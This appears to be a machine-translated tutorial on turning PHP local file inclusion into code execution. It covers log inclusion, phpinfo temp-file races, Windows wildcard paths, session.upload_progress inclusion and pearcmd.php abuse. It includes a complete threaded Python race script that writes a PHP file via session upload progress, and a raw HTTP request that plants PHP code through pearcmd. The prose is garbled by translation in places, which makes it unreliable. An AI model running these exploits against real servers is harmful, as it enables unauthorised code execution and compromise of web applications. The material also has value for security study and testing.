1. The local log contains

First, find out through various methods web journal , Then use the above include The way to include .

param=include$_GET[a];&a=/home/u244201241/.logs/php_error.log

If you can't find it web journal , Using conditional competition , contain tmp Files are ok .

2.phpinfo Compete with conditions

Use conditions :

1. There is phpinfo And other pages that can disclose temporary file names

2. Good network conditions , To make Race Condition success

Using scripts :

exp.py

We're talking about any one PHP File when sending an uploaded packet , No matter this PHP Whether the back end of the service is processed $_FILES The logic of ,PHP Will save the data uploaded by the user to a temporary file first , This file is usually located in the temporary directory of the system , The file name is php start , Followed by 6 Random characters ; Throughout PHP After the file is executed , These uploaded temporary files will be cleaned up .

The condition for this utilization is , You need a place to get the file name , for example phpinfo.phpinfo The page will output all the information of this request , Include $_FILES The value of the variable , It contains the full file name ：

3.Windows Clever use of wildcards

PHP In the reading Windows When you file , Will use FindFirstFileExW This Win32 API To find the files , And this API Wildcards are supported

•     DOS_STAR： namely <, matching 0 More than characters
•     DOS_QM： namely >, matching 1 Characters
•     DOS_DOT： namely ", Match point numbers

such , We are Windows Next , You can use the above wildcard to replace the random string in the temporary file name ：C:\Windows\Temp\php<<.（ because Windows Some unclear internal reasons , There are usually two < To match multiple characters

4.session.upload_progress And Session File contains

PHP Through session progress Function to write temporary files . The principle of this method is ,PHP In the open session.upload_progress.enable after , The information of the file uploaded by the user will be saved in Session in , and PHP Of Session It is saved in the file by default .

Use conditions :

1.session.upload_progress.enable by ON, The default is ON

2.session.upload_progress.cleanup by Off, The default is ON

Using scripts :

import threading
import requests
from concurrent.futures import ThreadPoolExecutor, wait

target = 'http://192.168.1.162:8080/index.php'
session = requests.session()
flag = 'helloworld'


def upload(e: threading.Event):
    files = [
        ('file', ('load.png', b'a' * 40960, 'image/png')),
    ]
    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/success', '<?=phpinfo()?>'); echo('{flag}'); ?>'''}

    while not e.is_set():
        requests.post(
            target,
            data=data,
            files=files,
            cookies={'PHPSESSID': flag},
        )


def write(e: threading.Event):
    while not e.is_set():
        response = requests.get(
            f'{target}?file=/tmp/sess_{flag}',
        )

        if flag.encode() in response.content:
            e.set()


if __name__ == '__main__':
    futures = []
    event = threading.Event()
    pool = ThreadPoolExecutor(15)
    for i in range(10):
        futures.append(pool.submit(upload, event))

    for i in range(5):
        futures.append(pool.submit(write, event))

    wait(futures)

5.pearcmd.php The clever use of

Use conditions :

1.PHP With Server Form operation

2. Open the register_argc_argv, Off by default

Utilization method :

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 192.168.1.162:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close